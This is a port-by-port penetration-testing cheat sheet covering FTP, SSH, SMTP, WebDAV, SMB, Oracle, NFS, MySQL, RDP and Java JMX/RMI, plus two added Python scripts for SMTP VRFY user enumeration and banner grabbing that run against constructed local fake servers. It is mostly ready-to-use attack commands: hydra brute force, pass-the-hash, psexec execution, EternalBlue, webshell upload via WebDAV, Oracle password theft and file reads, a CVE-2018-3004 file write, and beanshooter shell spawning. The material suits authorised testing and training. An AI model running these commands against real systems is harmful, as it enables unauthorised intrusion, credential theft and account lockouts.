21 - FTP

```bash
# Login
ftp <ip>
# Anonymous login: after login use these creds [User:password]
#   anonymous:anonymous
#   anonymous:          (empty password)
#   ftp:ftp
# Anonymous login with nmap
nmap --script=ftp-anon -p 21 <ip>
nmap -sC -sV -p 21 <ip>    # [better] ftp-anon is a default script
# Brute force login
hydra -L users.txt -P passwords.txt <ip> ftp
```
Search exploit for vulnerable version
22 - SSH
```bash
# Login with password
ssh <username>@<ip>            # then type password
# Login with private key
ssh -i id_rsa <username>@<ip>  # if the private key has a passphrase you need to type it
# Crack passphrase
python ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=<wordlist>
# Brute force login
hydra -L users.txt -P passwords.txt <ip> ssh
```
If login with a private key fails and you're asked for the user's password, look at the errors (-vv option). Make sure the public key is in the target's authorized_keys file and that the key file on your side is not group/world readable (ssh silently skips a key whose permissions are looser than 0600 and falls back to password authentication).
25 - SMTP
Search exploit for vulnerable version
Retrieve the hostname of the server (domain name)
```
francesco@debian:~$ nc <ip> <port>
220 openmailbox.xyz ESMTP Postfix: Welcome.   # Here (in the banner)
helo whatyouwant                              # helo command
250 openmailbox.xyz                           # Here
```
Username Bruteforce
Automation:
```bash
smtp-user-enum -U <wordlist> -t <ip>
```
Manual
```
francesco@debian:~$ nc <ip> <port>
220 openmailbox.xyz ESMTP Postfix: Welcome.
VRFY root
252 2.0.0 root                                # Output if user exists
VRFY idontexists
550 5.1.1 <idontexists>: Recipient address rejected: User unknown in local recipient table
```
Note: there are other commands you can use for the same purpose, such as RCPT TO (after a MAIL FROM) and EXPN, which is useful when VRFY is disabled. Before trusting the results, verify a name that cannot exist: a server that answers 252 for everything gives no information.
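The manual VRFY session above, automated: the client side sends HELO/VRFY/QUIT and classifies the reply codes, and a canary name is probed first so that a server which "confirms" any name is reported as inconclusive instead of yielding false hits. This is an added example and not part of the original cheat sheet; the fake Postfix-like responder at the bottom is constructed so the script runs offline, and the account list, the canary name and the host/port are assumptions for the demo.

```python
"""VRFY-based user enumeration, automating the manual session shown above.

Added example, not part of the original cheat sheet. The fake server at the
bottom is a constructed stand-in for a Postfix-like target so the script runs
offline; against a real target call vrfy_users(host, port, users) directly.
"""
import socket
import threading

FAKE_LOCAL_USERS = {"root", "postfix"}   # constructed: what the fake target knows
CANARY = "zz_no_such_user_9f3a"           # assumed to exist on no real target


def classify_vrfy_reply(reply: str) -> str:
    """Map a VRFY reply line to 'exists', 'unknown' or 'disabled'.

    Postfix answers 252 for a local user and 550 for an unknown one (see the
    manual session above); 250/251 mean the same as 252. 500/502 mean VRFY is
    refused: fall back to RCPT TO.
    """
    code = reply[:3]
    if code in ("250", "251", "252"):
        return "exists"
    if code in ("550", "551", "553"):
        return "unknown"
    if code in ("500", "502"):
        return "disabled"
    return "other:" + code


def _cmd(sock, rfile, line: str) -> str:
    """Send one command, return the first reply line (HELO/VRFY are single-line)."""
    sock.sendall((line + "\r\n").encode())
    return rfile.readline().decode(errors="replace").rstrip("\r\n")


def vrfy_users(host: str, port: int, users, timeout: float = 5.0) -> dict:
    """Return {user: status}. A canary is probed first: if the server 'confirms'
    a name that cannot exist, VRFY is uninformative and hits are reported as
    'inconclusive' rather than 'exists'."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("rb")
        rfile.readline()                          # 220 banner
        _cmd(sock, rfile, "HELO whatyouwant")     # 250 <hostname>
        canary = classify_vrfy_reply(_cmd(sock, rfile, "VRFY " + CANARY))
        results = {}
        for user in users:
            status = classify_vrfy_reply(_cmd(sock, rfile, "VRFY " + user))
            if status == "exists" and canary == "exists":
                status = "inconclusive"
            results[user] = status
        _cmd(sock, rfile, "QUIT")
    return results


def _serve(conn):
    """Constructed Postfix-like responder: only the verbs the client uses."""
    with conn, conn.makefile("rb") as rfile:
        conn.sendall(b"220 openmailbox.xyz ESMTP Postfix: Welcome.\r\n")
        for raw in rfile:
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                conn.sendall(b"250 openmailbox.xyz\r\n")
            elif verb == "VRFY" and arg in FAKE_LOCAL_USERS:
                conn.sendall(f"252 2.0.0 {arg}\r\n".encode())
            elif verb == "VRFY":
                conn.sendall(f"550 5.1.1 <{arg}>: Recipient address rejected: "
                             f"User unknown in local recipient table\r\n".encode())
            elif verb == "QUIT":
                conn.sendall(b"221 2.0.0 Bye\r\n")
                break
            else:
                conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")


def start_fake_smtp() -> int:
    """Listen on a random localhost port in a daemon thread; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def demo() -> dict:
    """Enumerate a small constructed list against the fake target."""
    port = start_fake_smtp()
    return vrfy_users("127.0.0.1", port, ["root", "postfix", "idontexists"])


if __name__ == "__main__":
    print(demo())   # {'root': 'exists', 'postfix': 'exists', 'idontexists': 'unknown'}
```

HELO is used rather than EHLO on purpose: EHLO returns a multi-line 250 reply and the one-line reader would get out of step. Replace the fake target with a real host and port and the same function works unchanged; if every name comes back `inconclusive`, switch to RCPT TO.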
80 - WebDAV
With WebDAV you can upload files. Normally credentials are required.
```bash
# 1 tool - davtest
# Check what file types are executed
davtest -auth <user>:<password> -url http://<ip>/<webdav_path>
# Upload file
davtest -url http://<ip>/<webdav_path> -auth <user>:<password> -uploadfile webshell.asp -uploadloc /destination/webshell.asp
```
```bash
# 2 tool - cadaver
cadaver http://<ip>/<webdav_path>
# then login.
# Use the PUT command to upload a file.
# If the executable extension is blocked, PUT the file with a harmless extension
# (e.g. .txt) and rename it with MOVE.
```
139/445 - SMB | Samba
```bash
# List shared folders
smbclient --no-pass -L //<ip>                        # Null user
smbclient -U 'admin%pwd' -L //<ip>                   # (1) With credentials
smbclient -U 'admin' -L //<ip>                       # (2) With credentials [pwd omitted, then type it]
smbclient -U 'admin%<nt_hash>' --pw-nt-hash -L //<ip>  # With hash (pass the hash): --pw-nt-hash tells smbclient that the "password" is the NT hash
# Obtain information (you can also enumerate users)
enum4linux -a [-u "<username>" -p "<passwd>"] <ip>
# Command execution (authenticated)
smbmap -H <ip> -u <user> -p <pass> -x 'ipconfig'
python3 psexec.py Administrator@<ip>
# Or the exploit/windows/smb/psexec metasploit module
```
Brute force login
Search exploit for vulnerable version
If SMBv1 is enabled, try EternalBlue (MS17-010). Check the supported dialects with nmap (--script smb-protocols) and confirm the vulnerability with smb-vuln-ms17-010 before launching the exploit: it can crash an unpatched host.
1521 - ORACLE DB (TNS protocol)
INTRODUCTION
Oracle clients communicate with the database using the TNS protocol
In Oracle DB a SID is specific to a database, it is unique in an environment and 'points' to one, and only one, database in an environment. A service name can be associated with one or more SIDs.
In a RAC environment each instance has its own unique SID, yet all of them can be reached through the same SERVICE_NAME. [Oracle Real Application Clusters (RAC) is a "shared-everything" database architecture in which two or more RAC nodes are clustered together and share the same database storage.]

| SID   | SERVICE_NAME |
|-------|--------------|
| test1 | test         |
| test2 | test         |

Both SIDs are associated with the SERVICE_NAME test, and if load balancing is configured, the listener will 'balance' the workload across all SIDs. However, if you want to reach test1 specifically, connect with the SID instead of the SERVICE_NAME.
```bash
# Oracle DB version
odat tnscmd -s <ip> --version
# Search valid SIDs (with default wordlist and bruteforce [default max-size 2 chars])
odat sidguesser -s <ip>
# Search valid SIDs with custom sids wordlist
odat sidguesser -s <ip> --sids-file sids.txt
# Search valid SNs (with default wordlist and bruteforce [default max-size 2 chars])
odat snguesser -s <ip>
# Search valid SNs with custom SNs wordlist
odat snguesser -s <ip> --service-name-file sn.txt
```
Find user credentials
[CVE-2012-3137] With a valid SID, and if the Oracle DB version is one of 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3, you can obtain the session key and salt for arbitrary users and crack their passwords offline.
[Guess password] You need SID or SN
```bash
# Guess password with SID/SN using default odat credentials
odat passwordguesser -s <ip> -d <SID>
odat passwordguesser -s <ip> -n <SN>
# NOTE: failed logins count against the profile's FAILED_LOGIN_ATTEMPTS and can lock
# the accounts you are guessing; keep the attempt count low on production systems
```
Analyze database
```bash
# enumerate database
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password> --basic-info
# open sql shell
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password> --sql-shell
# get hashed password when the account is not locked
odat passwordstealer -s <IP> -d <SID> -p <port> -U mobius -P <password> --get-passwords-not-locked
# read file (ex. ssh private key)
odat externaltable -s <IP> -d <SID> -p <port> -U mobius -P <password> --getFile /etc passwd passwd
# create file with cve-2018-3004 (ex. upload authorized key)
odat cve -s <IP> -d <SID> -p <port> -U mobius -P <password> --cve-2018-3004 /tmp/test "test"
# NOTE: there are many other things and techniques you can use with odat. Refer to the documentation
```
2049 - NFS
```bash
# Folders available to mount
showmount -e <ip>
# Mount
mount -t nfs <ip>:/test /mnt/folder
# Umount
umount /mnt/folder
# If you can't read/write inside the folder, create a local user (or change the uid of an
# existing one) with the same uid that owns the files, then su to it
### ls -lna /mnt/folder
### drwxrwxr-x 6 777 1 4096 Jan 7 2018 QWERTY    # owner uid 777, gid 1 (the "6" is the link count)
# 1 method
useradd newuser
usermod -u 777 newuser
# 2 method
nano /etc/passwd    # edit uid
# Note: if it doesn't work, umount, edit uid, mount again
# Note: this trick is for exports with root_squash; with no_root_squash you are already root on the share
```
3306 - MYSQL
```bash
# Local without pass
mysql -u root
# Local with pass
mysql -u root -p
# Remote without pass
mysql -h <hostname> -u root
# Remote with pass
mysql -h <hostname> -u root -p
```
Brute force login
Try with root default user
3389 - RDP
```bash
# Login
xfreerdp /v:<ip> /u:<username> /p:<password>    # add /cert:ignore if the self-signed certificate blocks the connection
# Brute force login (service is rdp, not ssh)
hydra -L users.txt -P passwords.txt <ip> rdp
# NOTE: RDP is domain authentication: a brute force can lock out every account in users.txt
```
Search exploit for vulnerable version
Tip: If you are not sure that a specific port runs RDP, you can check with the auxiliary/scanner/rdp/rdp_scanner Metasploit module or try to connect with xfreerdp.
5985,5986 - WinRM
Brute force login
Java RMI
```bash
# Tool: https://github.com/qtc-de/remote-method-guesser
rmg enum <ip> <port>
# Note: there are many other things and techniques you can use with rmg. Refer to the documentation
```
JMXRMI
```
# Find JMX port
nmap -sC -sV -p 45000 <ip>
[...]
PORT      STATE SERVICE  VERSION
45000/tcp open  java-rmi Java RMI
| rmi-dumpregistry:
|   jmxrmi
[...]
```
TESTING
```bash
# Tool: https://github.com/qtc-de/beanshooter
# jconsole (/usr/lib/jvm/java-xxxxxx-openjdk-amd64/bin/jconsole)
# (Some JDKs don't include jconsole)
# Check credentials
jconsole    # connect <hostname>:<port> [without credentials]
# Enumerate configuration
beanshooter enum <ip> <jmx_port>
# The best way to get a shell is with tonka
# Creating a TemplateImpl payload object to abuse StandardMBean
beanshooter standard <ip> <jmx_port> tonka
# Spawns a shell. NOTE: this works even if the target host doesn't reach you
beanshooter tonka shell <ip> <jmx_port>
# Note: there are many other things and techniques you can use with beanshooter. Refer to the documentation
```
Beanshooter Tips
If your local Java version is higher than the Java version of the application server, the server cannot load the bytecode and throws an exception (java.lang.UnsupportedClassVersionError). Build beanshooter with a JDK no newer than the target's.
How do you know which Java version the server is running? Connect with jconsole, go to "VM Summary", find "VM Arguments" and look at the "Boot class path" (the JDK directory in the path reveals the version).
Install with maven
My installation method (sdkman)
```bash
# https://sdkman.io/install
# 1 - Install sdkman
curl -s "https://get.sdkman.io" | bash
source "$HOME/.sdkman/bin/sdkman-init.sh"
sdk version
# 2 - Install jdk (ex. java 8) [choose based on the target]
sdk install java 8.0.275.hs-adpt
# 3 - Install maven
sdk install maven
# 4 - Check installation
mvn -v
#   Apache Maven 3.9.8
#   Java version: 1.8.0_275, vendor: AdoptOpenJDK, runtime: /home/kali/.sdkman/candidates/java/8.0.275.hs-adpt/jre
# 5 - Now you can install beanshooter
```
Other ports
Most of the services identified by the Nmap scan are easily recognizable; however, it's possible that a few open ports on a target system do not have a service banner. To learn more about these ports and the service running on them, we can perform banner grabbing with Netcat. Keep in mind that Netcat only shows something when the service speaks first: a service that waits for the client (HTTP, many custom daemons) stays silent until you send it a request.
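A small banner grabber that does what the Netcat step above does, plus the two things a plain `nc` session lacks: it sends generic probes when the service stays silent, and it escapes control characters so a hostile banner cannot inject escape sequences into your terminal. This is an added example, not part of the original page; the two fake services at the bottom are constructed so it runs offline, and their banners, the probe list and the timeouts are assumptions for the demo.

```python
"""Banner grabbing for ports nmap could not identify.

Added example, not part of the original page. `nc <ip> <port>` shows a banner
only when the service speaks first (FTP, SSH, SMTP); a service that waits for
the client (HTTP, many custom daemons) leaves nc hanging. This grabber waits
briefly, then sends generic probes, and escapes control characters so a hostile
banner cannot drive your terminal. The listener at the bottom is a constructed
stand-in used to run the example offline.
"""
import socket
import threading

# Probes to try, in order, when the service stays silent (assumed list).
PROBES = [
    b"\r\n",                                     # wakes many line-oriented daemons
    b"HEAD / HTTP/1.0\r\nHost: target\r\n\r\n",   # HTTP servers answer with a Server: header
]


def printable(data: bytes) -> str:
    """Decode and neuter control characters (escape sequences, bell) so that
    whatever the target sends cannot be interpreted by the terminal."""
    return "".join(
        c if 32 <= ord(c) < 127 or c in "\r\n\t" else f"\\x{ord(c):02x}"
        for c in data.decode("latin-1")
    )


def _recv(sock, timeout: float) -> bytes:
    sock.settimeout(timeout)
    try:
        return sock.recv(4096)
    except socket.timeout:
        return b""
    except OSError:          # reset by a service that disliked the probe
        return b""


def grab_banner(host: str, port: int, timeout: float = 3.0):
    """Return (how, banner): how is 'greeting' when the service spoke first,
    'probe:<n>' when probe n elicited the reply, or 'silent'."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = _recv(sock, timeout)
        if data:
            return "greeting", printable(data)
        for i, probe in enumerate(PROBES):
            try:
                sock.sendall(probe)
            except OSError:
                break
            data = _recv(sock, timeout)
            if data:
                return f"probe:{i}", printable(data)
    return "silent", ""


def start_fake_service(greeting: bytes, http_reply: bytes) -> int:
    """Constructed test service on a random localhost port. With a greeting it
    speaks first; otherwise it ignores everything until it sees an HTTP request
    line, then answers with http_reply. Returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            conn.settimeout(5)
            try:
                if greeting:
                    conn.sendall(greeting)
                while True:                      # serve until the client hangs up
                    data = conn.recv(1024)
                    if not data:
                        break
                    if not greeting and b"HTTP/" in data:
                        conn.sendall(http_reply)
            except OSError:
                pass

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def demo() -> dict:
    """Grab banners from a chatty and a silent fake service (both constructed)."""
    chatty = start_fake_service(b"SSH-2.0-OpenSSH_8.4p1 Debian-5\r\n", b"")
    quiet = start_fake_service(b"", b"HTTP/1.0 400 Bad Request\r\nServer: nginx\r\n\r\n")
    return {
        "chatty": grab_banner("127.0.0.1", chatty, timeout=0.5),
        "quiet": grab_banner("127.0.0.1", quiet, timeout=0.5),
    }


if __name__ == "__main__":
    for name, (how, banner) in demo().items():
        print(f"{name}: {how} -> {banner!r}")
```

The "quiet" fake deliberately ignores the bare CRLF probe, as a real HTTP server does, so the grabber only gets an answer from the second probe; that is the behaviour that makes a plain `nc` session look like a dead port. Against a real target use a longer timeout and add protocol-specific probes to PROBES as needed.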